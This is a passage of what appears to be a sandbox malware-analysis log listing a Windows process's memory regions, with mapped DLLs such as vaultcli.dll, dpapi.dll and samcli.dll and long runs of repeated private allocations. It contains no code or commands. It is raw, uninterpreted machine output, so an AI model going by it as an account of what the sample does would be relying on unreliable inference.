"\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1194 start_va = 0x21a0000 end_va = 0x24d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1195 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1292 start_va = 0x6c660000 end_va = 0x6c699fff monitored = 0 entry_point = 0x6c679be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1306 start_va = 0x73b60000 end_va = 0x73c27fff monitored = 0 entry_point = 0x73bcae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1353 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1354 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1355 start_va = 0x6fe60000 end_va = 0x6fe67fff monitored = 0 entry_point = 0x6fe61d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1356 start_va = 0x1ef0000 end_va = 0x1ef0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1357 start_va = 0x1fa0000 end_va = 0x2043fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1358 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1359 start_va = 0x769b0000 end_va = 0x769c2fff monitored = 0 entry_point = 0x769b1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1360 start_va = 0x658b0000 end_va = 0x658c4fff monitored = 0 entry_point = 0x658b5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1361 start_va = 0x65890000 end_va = 0x658a2fff monitored = 0 entry_point = 0x65895c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 1363 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1364 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1365 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1366 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1367 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1368 start_va = 0x71910000 end_va = 0x71956fff monitored = 0 entry_point = 0x719258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1369 start_va = 0x71960000 end_va = 0x71967fff monitored = 0 entry_point = 0x71961920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1370 start_va = 0x1f00000 end_va = 0x1f01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1371 start_va = 0x1f10000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1372 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1373 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1374 start_va = 0x1f10000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1375 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1376 start_va = 0x1f10000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1377 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1378 start_va = 0x1f10000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1379 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1380 start_va = 0x1f50000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1381 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1382 start_va = 0x24e0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1383 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1384 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1385 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1386 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1387 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1388 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1389 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1390 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1391 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1392 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1393 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1394 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1395 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1396 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1397 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1398 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1399 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1400 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1401 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1402 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1403 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1404 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1405 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1406 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1407 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1408 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1409 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1410 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1411 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1412 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1413 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1414 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1415 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1416 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1417 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1418 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1419 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1420 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1421 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1422 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1423 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1424 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1425 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1426 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1427 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1428 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1429 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1435 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1436 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1437 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1438 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1439 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1440 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1441 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1442 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1443 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1444 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1445 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1446 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1447 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1448 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1449 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1450 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1451 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1452 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1453 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1454 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1455 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1456 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1457 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1458 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1459 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1460 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1461 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1462 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1463 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1464 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1465 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1466 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1467 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1468 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1469 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1470 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1471 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1472 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1473 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1474 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1475 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1476 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1477 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1478 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1479 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1480 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1481 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1482 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1483 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1484 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1485 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1486 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1487 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1488 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1489 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1490 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1491 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1492 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1493 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1494 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1495 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1496 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1497 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1498 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1499 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1500 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1501 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1502 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1503 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1504 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1505 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1506 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1507 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1508 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1509 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1510 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1511 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1512 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1513 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1514 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1515 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1516 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1517 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1518 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1519 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1520 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1521 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1522 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1523 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1524 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1525 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1526 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1527 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1528 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1529 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1530 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1531 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1532 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1533 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1543 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1544 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1545 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1546 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1549 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1550 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1551 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1552 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1553 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1554 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = 